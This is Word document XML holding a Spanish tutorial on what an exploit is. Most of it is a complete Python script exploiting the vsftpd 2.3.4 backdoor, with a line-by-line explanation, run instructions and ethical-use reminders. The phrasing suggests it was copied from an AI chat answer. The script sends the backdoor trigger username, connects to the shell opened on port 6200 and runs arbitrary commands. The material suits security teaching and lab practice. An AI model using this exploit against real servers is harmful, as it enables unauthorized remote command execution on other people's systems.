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¿Qué es un Exploit?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00932EAA" w:rsidRPr="00932EAA" w:rsidRDefault="00932EAA" w:rsidP="0093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Un exploit es un código o programa que aprovecha una vulnerabilidad en un sistema para realizar una acción no autorizada, como obtener acceso no autorizado, ejecutar comandos, o alterar el funcionamiento del sistema.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Estructura Básica de un Exploit</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00932EAA" w:rsidRPr="00932EAA" w:rsidRDefault="00932EAA" w:rsidP="0093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Vamos a desglosar el exploit para vsftpd 2.3.4 en Python que te proporcioné anteriormente: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Código del Exploit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import socket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import sys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def exploit(ip, port, command):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Conectar al servidor FTP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 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)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s.connect((ip, int(port)))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Recibir la respuesta inicial del servidor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s.recv(1024)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el usuario malicioso para activar el backdoor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s.send(b'USER backdoor:)\n')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s.recv(1024)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la contraseña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s.send(b'PASS backdoor\n')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s.recv(1024)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Conectar al puerto 6200 donde se abre la shell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shell = socket.socket(socket.AF_INET, socket.SOCK_STREAM)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shell.connect((ip, 6200))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Enviar el comando y recibir la respuesta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shell.send(command.encode() + b'\n')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response = shell.recv(1024)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Imprimir la respuesta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print(response.decode())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# Cerrar las conexiones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shell.close()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s.close()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if __name__ == '__main__':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if len(sys.argv) != 4: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print("Uso: ./vsftpd_234_exploit.py [IP address] [port] [command]")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print("Ejemplo: ./vsftpd_234_exploit.py 192.168.1.10 21 whoami")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    sys.exit(1)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ip = sys.argv[1]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port = sys.argv[2]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command = sys.argv[3]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  exploit(ip, port, command)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Desglose del Código</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00932EAA" w:rsidRPr="00932EAA" w:rsidRDefault="00932EAA" w:rsidP="0093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Importar Librerías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import socket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import sys</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00932EAA" w:rsidRPr="00932EAA" w:rsidRDefault="00932EAA" w:rsidP="00932E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Se usan para manejar la conexión de red y los argumentos de línea de comandos.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00932EAA" w:rsidRPr="00932EAA" w:rsidRDefault="00932EAA" w:rsidP="0093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Función </w:t>
      </w:r>
      <w:r w:rsidRPr="00932EAA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exploit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Crear una conexión al servidor FTP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Enviar comandos específicos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activan la puerta trasera.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Conectar al puerto de la shell abierta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enviar el comando malicioso.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Recibir y mostrar la respuesta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32EAA" w:rsidRPr="00932EAA" w:rsidRDefault="00932EAA" w:rsidP="0093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Manejo de Argumentos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Verifica que se hayan proporcionado los argumentos necesarios (IP, puerto y comando).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00932EAA" w:rsidRPr="00932EAA" w:rsidRDefault="00932EAA" w:rsidP="00932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el Exploit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 los argumentos proporcionados para ejecutar la función </w:t>
      </w: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exploit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Ejecución y Pruebas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Configuración del Entorno</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00932EAA" w:rsidRPr="00932EAA" w:rsidRDefault="00932EAA" w:rsidP="0093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Instalar Python 3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Asegúrate de tener Python 3 instalado en tu sistema.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00932EAA" w:rsidRPr="00932EAA" w:rsidRDefault="00932EAA" w:rsidP="00932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Guardar y Ejecutar el Script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932EAA" w:rsidRPr="00932EAA" w:rsidRDefault="00932EAA" w:rsidP="00932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Guarda el código en un archivo </w:t>
      </w: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vsftpd_234_exploit.py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32EAA" w:rsidRPr="00932EAA" w:rsidRDefault="00932EAA" w:rsidP="00932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Ejecuta el script desde la línea de comandos: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932EAA" w:rsidRPr="00932EAA" w:rsidRDefault="00932EAA" w:rsidP="00932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932EAA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="es-CL"/>
        </w:rPr>
        <w:t>python3 vsftpd_234_exploit.py 192.168.1.10 21 whoami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Entorno Controlado</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00932EAA" w:rsidRPr="00932EAA" w:rsidRDefault="00932EAA" w:rsidP="0093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Utiliza un entorno controlado para realizar estas pruebas, como una máquina virtual con Kali Linux o cualquier otro sistema configurado para pruebas de seguridad.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Uso Responsable y Ético</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00932EAA" w:rsidRPr="00932EAA" w:rsidRDefault="00932EAA" w:rsidP="0093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Recuerda siempre:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00932EAA" w:rsidRPr="00932EAA" w:rsidRDefault="00932EAA" w:rsidP="0093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Utilizar exploits únicamente en entornos donde tienes permiso explícito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932EAA" w:rsidRPr="00932EAA" w:rsidRDefault="00932EAA" w:rsidP="00932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Practicar hacking ético</w:t>
      </w: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cumplir con las leyes y regulaciones locales.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00932EAA" w:rsidRPr="00932EAA" w:rsidRDefault="00932EAA" w:rsidP="00932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32EA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932EAA" w:rsidRPr="00932EAA" w:rsidRDefault="00932EAA" w:rsidP="00932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32EAA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="es-CL"/>
        </w:rPr>
        <w:t>Este es un ejemplo simple de cómo se estructura y utiliza un exploit en Python. Existen herramientas más avanzadas y completas, como Metasploit, que incluyen una gran cantidad de exploits y funcionalidades adicionales para pruebas de penetración. Aprender a usar y comprender estos scripts te ayudará a mejorar tus habilidades en ciberseguridad y a realizar pruebas de seguridad de manera más efectiva y responsable.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DB2342" w:rsidRDefault="00932EA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AE1"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="DD3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23C60"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="CCCC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5137D0"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D22E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12"/>
    <w:rsid w:val="00075EE0"/>
    <w:rsid w:val="00932EAA"/>
    <w:rsid w:val="00AB071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2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32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2EA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32EA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3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EA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32E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32EAA"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hljs-title">
    <w:name w:val="hljs-title"/>
    <w:basedOn w:val="Fuentedeprrafopredeter"/>
    <w:rsid w:val="00932EAA"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hljs-params">
    <w:name w:val="hljs-params"/>
    <w:basedOn w:val="Fuentedeprrafopredeter"/>
    <w:rsid w:val="00932EAA"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hljs-comment">
    <w:name w:val="hljs-comment"/>
    <w:basedOn w:val="Fuentedeprrafopredeter"/>
    <w:rsid w:val="00932EAA"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hljs-builtin">
    <w:name w:val="hljs-built_in"/>
    <w:basedOn w:val="Fuentedeprrafopredeter"/>
    <w:rsid w:val="00932EAA"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hljs-number">
    <w:name w:val="hljs-number"/>
    <w:basedOn w:val="Fuentedeprrafopredeter"/>
    <w:rsid w:val="00932EAA"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hljs-string">
    <w:name w:val="hljs-string"/>
    <w:basedOn w:val="Fuentedeprrafopredeter"/>
    <w:rsid w:val="00932EAA"/>
  </w:style>
  <w:style w:type="character" w:styleId="Textoennegrita">
    <w:name w:val="Strong"/>
    <w:basedOn w:val="Fuentedeprrafopredeter"/>
    <w:uiPriority w:val="22"/>
    <w:qFormat/>
    <w:rsid w:val="00932E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2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932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2EA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932EA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3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EA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32E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32EAA"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hljs-title">
    <w:name w:val="hljs-title"/>
    <w:basedOn w:val="Fuentedeprrafopredeter"/>
    <w:rsid w:val="00932EAA"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hljs-params">
    <w:name w:val="hljs-params"/>
    <w:basedOn w:val="Fuentedeprrafopredeter"/>
    <w:rsid w:val="00932EAA"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hljs-comment">
    <w:name w:val="hljs-comment"/>
    <w:basedOn w:val="Fuentedeprrafopredeter"/>
    <w:rsid w:val="00932EAA"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hljs-builtin">
    <w:name w:val="hljs-built_in"/>
    <w:basedOn w:val="Fuentedeprrafopredeter"/>
    <w:rsid w:val="00932EAA"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hljs-number">
    <w:name w:val="hljs-number"/>
    <w:basedOn w:val="Fuentedeprrafopredeter"/>
    <w:rsid w:val="00932EAA"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hljs-string">
    <w:name w:val="hljs-string"/>
    <w:basedOn w:val="Fuentedeprrafopredeter"/>
    <w:rsid w:val="00932EAA"/>
  </w:style>
  <w:style w:type="character" w:styleId="Textoennegrita">
    <w:name w:val="Strong"/>
    <w:basedOn w:val="Fuentedeprrafopredeter"/>
    <w:uiPriority w:val="22"/>
    <w:qFormat/>
    <w:rsid w:val="00932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2753</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>22</Lines>
  <Paragraphs>6</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company>Luffi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2024-07-12T07:23:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-07-12T07:23:00Z</dcterms:modified>
</cp:coreProperties>
</file>